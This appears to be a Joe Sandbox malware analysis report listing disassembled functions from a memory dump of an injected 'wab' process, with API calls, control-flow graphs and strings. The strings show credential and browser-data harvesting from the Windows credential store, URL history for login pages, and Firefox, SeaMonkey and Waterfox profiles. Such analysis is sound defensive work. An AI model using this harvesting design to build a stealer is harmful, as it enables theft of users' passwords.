                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                              • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                              • API String ID: 2941347001-70141382
                                                              • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                              • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                              • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                              • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                                              Function 004466F4 Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 638 4466f4-44670e call 446904 GetModuleHandleA 641 446710-44671b 638->641 642 44672f-446732 638->642 641->642 643 44671d-446726 641->643 644 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 642->644 646 446747-44674b 643->646 647 446728-44672d 643->647 653 4467ac-4467b7 __setusermatherr 644->653 654 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 644->654 646->642 648 44674d-44674f 646->648 647->642 650 446734-44673b 647->650 652 446755-446758 648->652 650->642 651 44673d-446745 650->651 651->652 652->644 653->654 657 446810-446819 654->657 658 44681e-446825 654->658 659 4468d8-4468dd call 44693d 657->659 660 446827-446832 658->660 661 44686c-446870 658->661 664 446834-446838 660->664 665 44683a-44683e 660->665 662 446845-44684b 661->662 663 446872-446877 661->663 669 446853-446864 GetStartupInfoW 662->669 670 44684d-446851 662->670 663->661 664->660 664->665 665->662 667 446840-446842 665->667 667->662 671 446866-44686a 669->671 672 446879-44687b 669->672 670->667 670->669 673 44687c-446894 GetModuleHandleA call 41276d 671->673 672->673 676 446896-446897 exit 673->676 677 44689d-4468d6 _cexit 673->677 676->677 677->659
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                              • String ID:
                                                              • API String ID: 2827331108-0
                                                              • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                              • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                              • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                              • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                                                              Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • memset.MSVCRT ref: 0040C298
                                                                • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                              • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                              • wcschr.MSVCRT ref: 0040C324
                                                              • wcschr.MSVCRT ref: 0040C344
                                                              • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                              • GetLastError.KERNEL32 ref: 0040C373
                                                              • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                              • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                              • String ID: visited:
                                                              • API String ID: 1157525455-1702587658
                                                              • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                              • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                              • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                              • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                              Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 704 40e175-40e1a1 call 40695d call 406b90 709 40e1a7-40e1e5 memset 704->709 710 40e299-40e2a8 call 4069a3 704->710 712 40e1e8-40e1fa call 406e8f 709->712 716 40e270-40e27d call 406b53 712->716 717 40e1fc-40e219 call 40dd50 * 2 712->717 716->712 722 40e283-40e286 716->722 717->716 728 40e21b-40e21d 717->728 725 40e291-40e294 call 40aa04 722->725 726 40e288-40e290 ??3@YAXPAX@Z 722->726 725->710 726->725 728->716 729 40e21f-40e235 call 40742e 728->729 729->716 732 40e237-40e242 call 40aae3 729->732 732->716 735 40e244-40e26b _snwprintf call 40a8d0 732->735 735->716
                                                              APIs
                                                                • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                              • memset.MSVCRT ref: 0040E1BD
                                                                • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                                • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                              • _snwprintf.MSVCRT ref: 0040E257
                                                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                              • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                              • API String ID: 3883404497-2982631422
                                                              • Opcode ID: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                              • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                              • Opcode Fuzzy Hash: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                              • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                              Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                              • memset.MSVCRT ref: 0040BC75
                                                              • memset.MSVCRT ref: 0040BC8C
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                              • memcmp.MSVCRT ref: 0040BCD6
                                                              • memcpy.MSVCRT ref: 0040BD2B
                                                              • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
                                                              • String ID:
                                                              • API String ID: 509814883-3916222277
                                                              • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                              • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                              • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                              • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                              Function 0041837F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 789 41837f-4183bf 790 4183c1-4183cc call 418197 789->790 791 4183dc-4183ec call 418160 789->791 796 4183d2-4183d8 790->796 797 418517-41851d 790->797 798 4183f6-41840b 791->798 799 4183ee-4183f1 791->799 796->791 800 418417-418423 798->800 801 41840d-418415 798->801 799->797 802 418427-418442 call 41739b 800->802 801->802 805 418444-41845d CreateFileW 802->805 806 41845f-418475 CreateFileA 802->806 807 418477-41847c 805->807 806->807 808 4184c2-4184c7 807->808 809 41847e-418495 GetLastError ??3@YAXPAX@Z 807->809 812 4184d5-418501 memset call 418758 808->812 813 4184c9-4184d3 808->813 810 4184b5-4184c0 call 444706 809->810 811 418497-4184b3 call 41837f 809->811 810->797 811->797 819 418506-418515 ??3@YAXPAX@Z 812->819 813->812 819->797
                                                              APIs
                                                              • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                              • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                              • GetLastError.KERNEL32 ref: 0041847E
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: CreateFile$??3@ErrorLast
                                                              • String ID: |A
                                                              • API String ID: 1407640353-1717621600
                                                              • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                              • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                              • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                              • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                              Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                              • String ID: r!A
                                                              • API String ID: 2791114272-628097481
                                                              • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                              • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                              • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                              • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                              Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                                • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                                • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                                • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                              • _wcslwr.MSVCRT ref: 0040C817
                                                                • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                              • wcslen.MSVCRT ref: 0040C82C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                              • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                              • API String ID: 62308376-4196376884
                                                              • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                              • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                              • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                              • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                              Function 0040BDB0 Relevance: 12.2, APIs: 8, Instructions: 151COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                              • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                              • wcslen.MSVCRT ref: 0040BE06
                                                              • _wcsncoll.MSVCRT ref: 0040BE38
                                                              • memset.MSVCRT ref: 0040BE91
                                                              • memcpy.MSVCRT ref: 0040BEB2
                                                              • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                              • wcschr.MSVCRT ref: 0040BF24
                                                              • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$CredEnumerateFreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
                                                              • String ID:
                                                              • API String ID: 3191383707-0
                                                              • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                              • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                              • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                              • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                              Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 00403CBF
                                                              • memset.MSVCRT ref: 00403CD4
                                                              • memset.MSVCRT ref: 00403CE9
                                                              • memset.MSVCRT ref: 00403CFE
                                                              • memset.MSVCRT ref: 00403D13
                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                              • memset.MSVCRT ref: 00403DDA
                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                              • String ID: Waterfox$Waterfox\Profiles
                                                              • API String ID: 3527940856-11920434
                                                              • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                              • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                              • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                              • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                              Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 00403E50
                                                              • memset.MSVCRT ref: 00403E65
                                                              • memset.MSVCRT ref: 00403E7A
                                                              • memset.MSVCRT ref: 00403E8F
                                                              • memset.MSVCRT ref: 00403EA4
                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                              • memset.MSVCRT ref: 00403F6B
                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                              • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                              • API String ID: 3527940856-2068335096
                                                              • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                              • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                              • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                              • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                              Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 00403FE1
                                                              • memset.MSVCRT ref: 00403FF6
                                                              • memset.MSVCRT ref: 0040400B
                                                              • memset.MSVCRT ref: 00404020
                                                              • memset.MSVCRT ref: 00404035
                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                              • memset.MSVCRT ref: 004040FC
                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                              • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                              • API String ID: 3527940856-3369679110
                                                              • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                              • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                              • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                              • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                              Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                              • API String ID: 3510742995-2641926074
                                                              • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                              • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                              • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                              • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                              Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                              • memset.MSVCRT ref: 004033B7
                                                              • memcpy.MSVCRT ref: 004033D0
                                                              • wcscmp.MSVCRT ref: 004033FC
                                                              • _wcsicmp.MSVCRT ref: 00403439
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                                                              • String ID: $0.@
                                                              • API String ID: 3030842498-1896041820
                                                              • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                              • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                              • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                              • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                              Function 004449B9 Relevance: 10.6, APIs: 7, Instructions: 61libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
